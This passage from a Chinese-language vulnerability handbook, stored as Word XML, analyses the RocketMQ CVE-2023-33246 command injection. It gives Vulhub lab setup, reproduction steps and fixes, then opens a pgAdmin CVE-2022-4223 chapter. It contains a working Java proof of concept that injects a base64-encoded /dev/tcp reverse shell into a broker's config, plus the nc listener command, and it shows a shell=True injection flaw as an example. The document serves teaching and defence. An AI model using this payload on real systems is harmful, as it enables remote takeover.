      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sh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. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>echo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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;base64_payload&gt;|base64 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>d|bash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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>// 拼接后的完整命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sh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-c $@|</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sh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. echo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>echo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&lt;base64_payload&gt;|base64 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>d|bash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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;/bin/startfsrv.sh -c ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786DC87F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其中，$@表示传递给脚本的所有参数，|</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> .表示将参数通过管道交给</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行。通过这种方式，攻击者将base64编码的反弹Shell命令解码并执行，同时用分号";"将原有的startfsrv.sh路径分隔开，避免命令执行失败。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B19D62" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（4）漏洞根因总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EF8C27" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>该漏洞的根因有三：其一，updateBrokerConfig接口缺乏身份认证与配置项白名单；其二，rocketmqHome配置项在构建启动命令时直接字符串拼接，未做命令注入防护；其三，filterServerNums配置可被攻击者控制为非零值，从而触发Filter Server的启动流程。三者环环相扣，最终导致RCE。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE05596" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4 </w:t>
      </w:r>
      <w:r>
        <w:t>实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4035C7" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>靶机：Vulhub RocketMQ CVE-2023-33246环境，NameServer端口9876，Broker端口10911</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5C0EC7" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>攻击机：Kali Linux，安装JDK 8+、Maven、nc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAFA8F5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lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F18F7A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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：准备</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PoC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1A184F" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>使用IDEA或Eclipse新建Maven项目，在pom.xml中引入rocketmq-tools依赖</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A235223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&lt;dependency&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    &lt;groupId&gt;org.apache.rocketmq&lt;/groupId&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    &lt;artifactId&gt;rocketmq-tools&lt;/artifactId&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    &lt;version&gt;5.1.0&lt;/version&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0812CE7A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步骤二：编写并执行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PoC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5487D5EB" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>编写Main类，通过DefaultMQAdminExt更新Broker配置</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2669AA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public class Main {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    private static String getCmd(String ip, String port) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        String cmd = "bash -i &gt; /dev/tcp/" + ip + "/" + port + " 0&gt;&amp;1";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        String cmdBase = Base64.getEncoder().encodeToString(cmd.getBytes());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        return "-c $@|sh . echo echo \"" + cmdBase + "\"|base64 -d|bash -i;";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 xml:space="preserve">    public static void main(String[] args) throws Exception {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        String targetHost = "192.168.1.100";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        String targetPort = "10911";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        String shellHost = "192.168.1.200";  // 攻击机IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        String shellPort = "12345";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 xml:space="preserve">        String targetAddr = String.format("%s:%s", targetHost, targetPort);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Properties props = new Properties();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        props.setProperty("rocketmqHome", getCmd(shellHost, shellPort));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        props.setProperty("filterServerNums", "1");  // 触发Filter Server启动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 xml:space="preserve">        DefaultMQAdminExt admin = new DefaultMQAdminExt();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        admin.setNamesrvAddr("192.168.1.100:9876");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        admin.start();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        admin.updateBrokerConfig(targetAddr, props);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        admin.shutdown();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2EB0A209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步骤三：监听反弹Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4944EFBD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在攻击机上启动</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>监听，等待约30秒后即可收到Broker反弹的Shell：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ADEF89" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lvvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCB5EB8" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.6 </w:t>
      </w:r>
      <w:r>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FD8DBD" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>① 升级至Apache RocketMQ 5.1.1及以上版本，官方对updateBrokerConfig接口增加了ACL权限校验，并对rocketmqHome等敏感配置项的更新做了限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65335DC8" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>② 为RocketMQ启用ACL（访问控制列表），限制updateBrokerConfig等管理接口的调用权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA19E7D" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>③ 在网络层面限制NameServer（9876）和Broker（10911）端口的访问来源，仅允许可信IP访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194A23A3" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>④ 若业务不需要Filter Server功能，将filterServerNums设置为0并禁止修改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C45F25D" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="326FC4EF" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>第四章</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pgAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>无授权远程命令执行漏洞（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CVE-2022-4223</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E2D4ED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4.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0F423F" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pgAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是PostgreSQL数据库的主流开源管理平台，提供Web化的数据库管理、查询与监控功能。在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pgAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6.16及以前版本中，/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>validate_binary_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>接口用于验证</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pg_restore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>等PostgreSQL工具的路径是否有效，但该接口对用户传入的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>utility_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参数未做充分校验，导致未授权攻击者可通过命令注入执行任意系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6D1C91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注：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pgAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>虽非Apache基金会项目，但作为数据库中间</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>件管理</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工具，常与Apache生态组件共同部署，故纳入本手册一并分析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEDAA8F" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>影响版本</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21B51F85" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>pgAdmin &lt;= 6.16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C86F6A0" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 </w:t>
      </w:r>
      <w:r>
        <w:t>代码级成因剖析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B032A4" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（1）漏洞入口：validate_binary_path接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2293813E" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>pgAdmin的/misc/validate_binary_path接口接收一个JSON请求体，其中包含utility_path字段，用于指定待验证的PostgreSQL工具路径。该接口的后端处理逻辑会调用subprocess模块执行工具的--version命令，以判断路径是否有效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD1DBD4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# pgAdmin validate_binary_path 后端处理逻辑（简化示意）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>@app.route('/misc/validate_binary_path', methods=['POST'])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>def validate_binary_path():</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    data = request.get_json()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    utility_path = data.get('utility_path', '')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    # 直接将utility_path拼接到命令中，未做转义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    cmd = f'"{utility_path}" --version'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
